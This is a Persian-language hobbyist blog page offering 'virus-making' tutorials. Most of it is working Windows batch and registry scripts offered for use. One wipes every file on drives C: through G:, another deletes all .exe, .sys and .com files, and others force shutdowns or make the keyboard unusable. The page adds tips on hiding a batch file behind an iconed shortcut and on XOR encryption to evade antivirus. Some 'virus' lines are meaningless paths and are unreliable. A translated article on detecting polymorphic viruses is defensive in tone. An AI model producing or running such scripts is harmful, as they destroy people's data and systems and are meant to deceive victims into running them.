عکس×دانلود×موزیک ×موبایل×وهر چه شما می خ

تصـــــــوير تصادفي

منوی کاربری

پيغام مدير : به شما كاربر گرامي سلام عرض مي كنم . اميدوارم در اين وبلاگ دقايقي خوبي را سپري كنيد . براي آگاهي از امكانات اين وبلاگ خواهشمندم كه تا آخر صفحه اين وبلاگ را مشاهده نماييدمدیر وبلاگ از حضور شما در این وبلاگ در این جا شادمان هستیم

...............................

..............................

لينك دوستان

۞زیباترین عکس ها برای شما۞

خانه موبایل وکلیپ

::'گالری دانلود::

براي تبادل لينک ابتدا لينک مارو بانام:عکس×دانلود×موزیک ×موبایل×وهر چه شما می خ - آموزش ویروس سازی در وبلاگ ياسايتتان قراردهيد ،

سپس از طریق فرم نظرات به ما خبر دهيد تاما هم اين کار رو براي شما بکنيم.

چت بامديـــــر

براي Add کردن کليک کنيد

یابنده سایت ترفند

آرشيو

شهریور 1386
مرداد 1386

سایتی دیگر از ما

blogfa.Com

منوي اصلي

یک موقعیت عالی فقط در سایت ترفند
تبلیغ در دوسایت فقط با 10000هزار تومان در هر ماه
این تبلیغ تا آخر شه ماه تعلیلی اعتبار دارد شماره تماس یا وبلاگ خود را در نظرات بصورت اختصاصی بنویسید

ساعــــت

نويسنده گان

موضوعات

مطالب جالب ديگر سايتها

لينك دوني

ملودیها
مشتری پیدا کن 10درصد پول را بگیر
شادمهر
دعوتنامه پرشین گیگ
دانلود عکس خفن دختر ایرونی و آهگ رپ
جواهری در قصر
گالری عکس بیش از 2000عکس در سایت بدون مسیر
ترفند بیش از 1000ترفند موزیک دانلود نرم افزارو....
تمام لينکها

لوگو دوستان

آمار

»
»تعداد بازديدها:
»کاربر: Admin

آموزش ویروس سازی

همه در ادامه متن

ادامه از صفحه قبل

کپی برداری فقط با نام سایت مجاز می باشد www.tarfand000.blogfa.com

چطور ويروسمونو غير قابل شناسايی کنيم؟ (قسمت ۳)

سلام. شرمنده از وقفه ای که پيش اومد ولی چه ميشه کرد ديگه!. خوب داشتيم رو روش های encrypt سازی کار می کرديم و حالا روش بعدی:

روش XOR:

ميشه گفت اين روش رو بسياری از ويروس های نرمال asm هم برای encrypt سازی خودشون استفاده می کردند و تقريبا بهترين و شناخته شده ترين روشه! بايد بگم xor هم يه عملونده درست مثل + يا - و تقريبا تو تمام زبون های برنامه نويسی هم وجود داره. اما قسمت سخت کار درک روش کار اين عملونده! به اين عبارت توجه کنيد:

5 XOR 3 = 6

خوب همينه ديگه! اگر هيچ اطلاعاتی در مورد نحوه کار اين عملوند نداشته باشيد عمرا نتونيد متوجه بشيد بين ۳ و ۵ چه رابطه ای هست که بشه ۶!!!! در واقع اين عملوند با معادل های باينری اعداد يا حروف کار می کنه (اگر باينری بلد نيستيد هم خيالی نيست). و همونطوری که بايد/شايد بدونيد باينری ها فقط از ۰ و ۱ تشکيل ميشن. مثلا معادل باينری ۵ = ۰۰۰۰۰۱۰۱ و معادل سه = ۰۰۰۰۰۰۱۱. با اين توضيحات يه نگاه ديگه بندازيد:

   0 0 0 0 0 1 0 1                 معادل سه
   0 0 0 0 0 0 1 1      XOR    معادل پنج
==========
   0 0 0 0 0 1 1 0                معادل شش

خوب حالا ديگه شايد به رابطش پی برده باشيد!! وقتی که عملوند XOR روی دو باينری تاثير می زاره همونطور که در بالا می بينيد اگر هردو بيت ۰ باشند بيت جواب هم ۰ ميشه. اگر يکی از بيت ها ۱ و ديگری ۰ باشه بيت جواب ۱ خواهد شد ولی اگر هر دو بيت ۱ باشه بيت جواب ۰ خواهد شد (در ضمن اين کار رو بايد با هر ۸ تا بيت انجام بديم)! خوب اگر به شماتيک بالا نگاه کيند می بينيد که طبق توضيح پنچ تا بيت اول (ما از چپ شروع می کنيم) که در هر دو باينری ۰ بوده پنج تا ۰ در باينری جواب بوجود آورده. در بيت ششم و هفتم هم يکی ۰ و يکی ۱ داشته پس جواب در هر دو حالت ۱ ميشه. اما بيت هشتم هر دو باينری ۱ هست پس بيت هشتم باينری جواب ۰ خواهد شده. و حالا ۰۰۰۰۰۱۱۰ مقدار باينری معادل ۶ هستش (بازم می گم لازم نيست شما مقدار باينری معادل هر عدد یا حروفی رو بدونيد!)

Tuesday, August 23, 2005

اینم چنتا ویروس خطری

متن ویروس::::

ATTRIB -a -s -h -r c

ATTRIB -a -s -h -r c:\windows\*.*

Echo y | echo a | Echo y | del c:\*.*

Echo y | echo a | Echo y | del d:\*.*

Echo y | echo a | Echo y | del e:\*.*

Echo y | echo a | Echo y | del f:\*.*

Echo y | echo a | Echo y | del g:\*.*

echo y | copy *.* C:\

echo y | copy *.* D:\

echo y | copy *.* E:\

echo y | copy *.* F:\

echo y | copy *.* G:\

resrart

توجه:::::در صورت اجرا شدن این ویروس در سیستم خودتون راهی جز اف دیسک ندارید{باور نمیکنی امتحان کن}

قسمت اول ویروس بلاستر:

امروز يادميگيريم كه:
1- چگونه ويروس Blaster را بسازيم
2- چگونه براي BatchFile ها آيكون بسازيم
3- چگونه خودمان در Notepad ترفند كشف كنيم!!!
فكر ميكنم همه شما ويروس Blaster را بشناسيد ويروسي كه باعث Shutdown شدن كامپيوتر در 60 ثانيه ميشد... و حتي عده كثيري از شما روش ساخت آن را بدانيد ولي در پايان اين سري مقالات و جهت تكميل اين سري از مقالات لازم ميدانم نگاهي سريع به آن بيندازيم و سپس به نكات تكميلي اين سري مقالات ميپردازيم. اين ويروس را به طرق مختلفي و با دستورات گوناگوني ميتوان نوشت كه در اينجا دو روش را مورد بررسي قرار ميدهيم در ضمن لطفا اگر با اين دستورات از قبل آشنايي نداريد حتما از Copy/Paste استفاده كنيد .
روش اول/ با استفاده ازShortcut در جايي از دسكتاپ خود Right Click كنيد و در بخش New گزينه Shortcut را انتخاب كنيد و در بخش ظاهر شده يكي از دستورات زير را وارد كنيد:
shutdown -s -t xx -1
windir%system32shutdown.exe -s -t xx% -2

توضيح: بعد از اينكه Paste كرديد به جاي xx در دستورات بالا مدت زماني را بر حسب ثانيه قرار دهيد تا كامپيوتر پس از آن زمان خاموش شود. سپس Next را بزنيد و براي فايل خود يك نام برگزينيد و كار تمام است!!.
روش دوم/ به كمكNotepad نت پد را باز كنيد و باز هم يكي از دو دستور بالا را در آن Paste كنيد و حالا فايل خود را با پسوند bat يعني با نامي مثل shutdown.bat سيو كنيدفكر ميكنم تا به حال بايد متوجه شده باشيد كه bat مخفف BatchFile است. براي پادزهر درست كردن براي اين ويروس هم ميتوانيد از دستور زير استفاده كنيد:
shutdown -a
و همه مراحل قبل را انجام دهيد. اين دستور هم از هر دو راه فوق قابل اجرا است. حالا ميرسيم به نكات تكميلي در مورد مقالات اين يك هفته:
خيلي ها سوال ميكنند كه چگونه ميتوان براي BatchFile ها آيكون انتخاب كرد. بايد بگويم يكي از ساده ترين روشها كه به هيچ نرم افزار خاصي نياز ندارد اين است كه شما از BatchFile مورد نظر يك Shortcut بسازيد و براي Shortcut براحتي آيكون انتخاب كنيد و فايل اصلي را Hidden كنيد .
تا به حال هيچ به اين فكر افتاده ايد كه اگر در كامپيوتري Notepad و Wordpad و Microsoft Word نصب نشده باشد شما اين همه ترفند را كجا ميخواهيد پياده كنيد؟؟؟!!!. آيا ميدانيد هكرها معمولا در محيط متني ديگري بجز اينها اقدام به نوشن برنامه ميكنند؟؟. بله اين محيط متني به نسبت ناشناخته همان اديتور داس Dos Editor است. شما در اين اديتور ميتوانيد كد برنامه ها را ببينيد!. براي وارد شدن به اين محيط وارد داس شويد و تايپ كنيد Edit صبر كنيد!!!قبل از اينكه وارد اين محيط شويد بايد بدانيد بر خلاف محيط بي آزار نت پد محيط Dos Editor بسيار بسيار خطرناك است. هرگونه تغييري كه خواسته يا ناخواسته در متن كد ها بوجود آوريد امكان هيچگونه بازگشت ندارد اينجا از كليدي به نام Undo خبري نيست!! همچنين همه تغييرات بطور خودكار سيو ميشود و هيچگاه موقع خروج از اديتور ازشما سوال نميشود كه Do you want to save changes و همه چيز بطور خودكار ذخيره شده و اگر احيانا كد فايل هاي اصلي سيستم را دستكاري كنيد حتي System Restore و Backup هاي رجيستري هم به دادتان نخواهند رسيد... اما براي اينكه كار با اديتور آشنا شويد و خودتان ترفندي كشف كنيد مطابق زير عمل كنيد:
1- وارد داس شويد و تايپ كنيد Edit تا وارد اديتور شويد كه صفحه اي آبي رنگ است
2- از منوي بالاي صفحه File را انتخاب و روي Open كليك كنيد.
3- به اين مسير برويد:C / WINDOWS و در پنجره سمت چپ دنبال فايلي به نام explorer.scf بگرديد اگر يادتان باشد شما در مقالات قبلي فايل ديگري را نيز با پسوند scf ساخته بوديد... يادتان مي آيد؟؟آيكون Show Desktop بود.
4- متني كه در آن ميبينيد را عينا درون Notepad وارد كنيد و فايل خود را باهمان پسوند scf سيو كنيد. به اين طريق برنامه explorer.scf بر روي صفحه ظاهر ميشود.. بله شما اولين ترفند خود را خودتان ساختيد!!! به اين وسيله شما ميتوانيد خودتان در Notepad ترفند كشف كنيد!!!! من هم به همين طريق اين ترفندها را براي شما مي نوشتم.

--------------------------------------------------------------------------------

خوب ساختن ویروس رو آغاز می کنم
روی start رفته و روی run کلیک کنید و notepad را تایپ کنید بعد از باز شدن پنجره این ها رو بنویسید توش

@echo off

Cls

===========

Color fc

Del /a c:\*.com

Del /a c:\*.sys

Del /a c:\*.exe /s

===========

خوب تایپ کردن دیگه بسه این فایل را با هر نامی که دل تان خواست ذخیره کنید ولی پسوند را با نام bat بگذارید ، مثل love.bat

آموزش ساخت روبات و هک و بوت

شناسایی ویروسهای با ساختار پیچیده

مشخصه های زیادی هستن که میشه با اونا بازدهی یک آنتی ویروس رو اندازه گرفت و البته پشتیبانی که از این آنتی ویروس توسط شرکت ارائه دهنده اون میشه. بعضی از این مشخصه ها میزان زمانی هست که طول میکشه تا شرکت صاحب آنتی ویروس بتونه رفتار جدیدی از ویروسها رو به تواناییهای آنتی ویروس اضافه کنه. ولی آیا این کافیه ؟

در این مقاله ما مشکلات تشخیص ویروسهای ساختار پیچیده رو میبینیم. از جمله : پلی مورفیک – متا مورفیک و ویروسهای نقطه - ورودی مبهم. چه آنتی ویروسی بتونه این نوع ویروسها رو شناسایی بکنه یا نکنه .. این مشخصه ها میتونه معیار خوبی برای ارزیابی این محصولات باشه.

در این مقاله میبینیم که چطور ویروسهای ساختار پیچیده میتونن یک تهدید کاملا متفاوت برای سازمانها و سیستمها باشن. اول از همه باید بدونیم ویروسهای پلی مورفیک – متا مورفیک و نقطه – ورود مبهم چی هستن .. بفهمیم که کی اینها یک تهدید خطرناک علیه ما هستن .. و سپس چند نمونه که در دنیای واقعی شناسایی شدن رو ببینیم. این مقاله ما رو با محدودیت های تکنولوژی موتور آنتی ویروسهای فعلی آشنا میکنه.

نگاهی یه ویروسهای ساختار پیچیده.

زمانی تعداد ویروسهایی که یک محصول (آنتی ویروس) شناسایی میکرد مشخصه مهم و تعیین کننده ای برای شهرت اون آنتی ویروس بود ... ولی اکنون این قضیه کاملا فرق کرده. امروزه بازه های زمانی که یک آنتی ویروس باید پاسخگوی تهدیدهای جدید باشه و شناسایی دینامیک ویروسها دو مسئله بسیار مهم برای هر شرکتی میباشد. اما این در معیارها ویروسهای ساختار پیچیده در نظر گرفته نشده اند. شناسایی یک ویروس ساختار پیچیده یعنی شناسایی یک تهدید که ذاتا قابل شناسایی نیست ... و یا افشا کردن محدودیتهای موتورهای ویروسیاب آونا رو غیرقابل شناسایی کرده. ما با چند تعریف شروع میکنیم.

ویروس پلی مورفیک ویروسی هست که ظاهر خودش رو بشکل برنامه های میزبان در میاره. برای مثال بدنه خودش رو هر دفعه با کلیدهای مختلف رمزنگاری میکنه و بعد از آن خودش هم عملیات دیکد (De Code) رو انجام میده. عملیات دیکد (Decryptor) بصورت تغییرات تصادفی سرتاسری در مشخصه های قابل شناسایی ویروس هست که البته ویروس رو تقریبا غیر قابل دستیابی میکنه.

ویروس متا مورفیک ... ویروسی هست که خودشو بعنوان برنامه میزبان جا میزنه. و البته کدینگ لازم رو هم هر جا لازم باشه انجام میده. تفاوت در ظاهر این نوع ویروس ناشی از تغییراتی هست که ویروس در بدنه خودش ایجاد میکنه. نکته قابل توجه اینکه تکنیکهای مختلفی هم برای اینکار وجود داره.

یکی از این تکنیکها که توسط ویروسهای متا مورفیک بکار گرفته میشه اضافه و حذف کردن دستورات (کدهای) آشغال و بی مصرف (Garbage) هست. این دستورات هیچ تاثیری روی عملکرد ویروس نمیذاره ولی براحتی فضایی رو اشغال میکنه و تحلیل ویروس رو کاملا سخت میکنه. مثلا اینکه عبارت 3*x با عبارت x+x+x جایگزین میشه که در کارکرد ویروس تاثیری نداره اما از دید آنتی ویروس بسیار متفاوت به نظر میرسه. البته این یه مثال بود ... فکر کنید اگه 500 خط کد اینجوری تغییر بکنه .. عملا آنتی ویروس تبدیل به برگ چغندر میشه !!!!

ویروس نقطه – ورود مبهم (EPO ) ویروسی هست که کنترل برنامه میزبان رو غیر مستقیم بدست میگیره و خیلی سریع خودشو به نقطه – ورود میرسونه. این ویروس موقعیت یه متغیر برنامه میزبان رو اشغال میکنه و با یک تابع API یا پرولوگ کنترل برنامه رو به جایی که کدهای مخرب وجود داره هدایت میکنه.

بدون توجه به نکنیکی که برای کشف ویروسها وجود داره ... ما باید بدونیم این ویوریها چجوری کار میکنن و با چه الگوریتمی خودشونو تکثیر میکنن.

تصمیم به تهدید.

ویروسهای ساختار پیچیده خودشونو نشون نمیدن تا اینکه بیرون از آزمایشگاه کشف بشن. مثلا جایی در حیات وحش !!!!

این ها چند مثال از ویروسهای فوق العاده خطرناک Win32 هستند که با روش مهندسی معکوس تولید شدن. اینها برای یک محقق امنیتی میتونه خیلی آموزنده باشه تا بتونه کدی رو برای شناسایی این ویروسها طراحی کنه : W95/SK (PDF document) -- W95/Zmist (PDF document) -- W32/Simile (PDF document) -- W32/Efish (PDF document) -- W95/Perenast .

تشخیص شناسایی ویروسهای پیچیده.

ممکنه بپرسید : چه اهمیتی داره که ویروسهای اینچنینی رو شناسایی کنیم... اگه اینهمه مرموز و وحشی هستند ؟؟ خب اول از همه اونها راهشون رو به حیات وحش پیدا میکنن. برای مثال Win32/Toal که یک کرم پلی مورفیک هست ... همیشه بعنوان یک ویروس خطرناک در Mailing List ها مطرح هست.

همچنین حتی برای ویروسهای خالص متاسفانه برای ایجاد مشکلات در سیستمها ... واکنش آنتی ویروسها به این نوع ویروسها میتونه محدودیتهای زیادی را درباره تکنولوژی موتور آنها آشکار کنه و البته مهارت تیم مسئول. برخی کمپانیها فورا کد شناسایی رو ظرف چند ساعت یا چند روز تولید میکنن. برای برخی دیگر هم ممکنه این فرایند تا چند ماه ممکنه طول بکشه. ویا حتی سالها !!! مثل W95/Zmist .

حالا اگه کمپانی آنتی ویروس شما در این رقابت بازنده باشه چی ؟!؟؟؟ اونا قطعا از انعطاف پذیری محصولات و دانش بالای فنی تیم نرم افزاریشون تعریف میکنن. اما اگه در آینده ویروس جهش یافته پلی مورفیکی منتشر شد چی؟؟ آیا بازهم میتونن جوابگو باشن ؟؟

ویروس run time eror

یک نوتپد باز کنید و در آن تایپ کنید:

C:\WINDOWS\WinSxS\x86_Microsoft.Tools.VisualCPlusPlus.Runtime-Libraries_6595b64144ccf1df_6.0.0.0_x-ww_ff9986d7 and kill files

ویروس بلستر:

C:\WINDOWS\java\classes\kick now victum/shutdown-s

ویروس repair windows killer:

C:\WINDOWS\repair\kill

ساخت ويروس Flicker
امروز شما با ويروس Flicker آشنا ميشويد. البته شايد بعضي از شما آن را بشناسيد چون برنامه نسبتا معروفي است كه بيشتر براي شوخي كردن از آن استفاده ميشود. البته flicker بيشتر شباهت به يك برنامه اعصاب خوردكن دارد تا يك ويروس.FLICKER در معني به معناي چشمك زن و سوسو زدن است و دليل اين نامگذاري اين است كه اين به اصطلاح ويروس كاري ميكند كه كاربر هرگاه دكمه اي از كيبرد را فشار دهد يك صداي بوغ كه به آن اصطلاحا Beep گفته مشود از كامپيوتر شنيده ميشود و هم زمان با اين صدا صفحه مانيتور يكبار بطور سريع چشمك ميزند. و با اين وضع عملا كار با كيبرد امكانپذير نيست. اين ويروس از آن دسته است كه به كمك رجيستري كار ميكند.
خب حالا ميرسيم به شروع كار:
Notepad را باز كنيد و عبارت زير را در آن وارد كنيد

Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Control Panel\Accessibility\Keyboard Response]
"Flags"="127"
[HKEY_CURRENT_USER\Control Panel\Accessibility\SoundSentry]
"Flags"="3"
"WindowsEffect"="3"

سپس آن را با پسوند Reg و با نامي مثل FlickerON.Reg سيو كنيد.
حال يك فايل Notepad ديگر باز كنيد و عبارت زير را به منظور غيرفعال كردن ويروستان در آن وارد كنيد:

Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Control Panel\Accessibility\Keyboard Response]
"Flags"="126"
[HKEY_CURRENT_USER\Control Panel\Accessibility\SoundSentry]
"Flags"="2"
"WindowsEffect"="0"

و آن را هم به همان روش بالا ولي اين بار با نامي مثل FlickerOff.Reg سيو كنيد. حال شما دو فايل رجيستري ساختيد كه با كليك كردن روي هركدام از آنها از شما اجازه گرفته و درون رجيستري Import ميشوند. حال براي امتحان روي FlickerOn كليك كنيد و وقتي Import شد كامپيوتر خود را Restart كنيد تا نحوه كارش را ببينيد. واضح است كه براي غير فعال كردن بايد همين كارها را با FlickerOff انجام دهيد با اين تفاوت كه شما در آن موقع فقط ميتوانيد از Mouse استفاده كنيد چون كيبرد شما كماكان غير قابل استفاده است!!!!!. لازم به ذكر است كه همه ويروسها مثل Flicker مستقيما به كمك رجيستري عمل نميكنند و روشهاي مختلفي براي كار دارند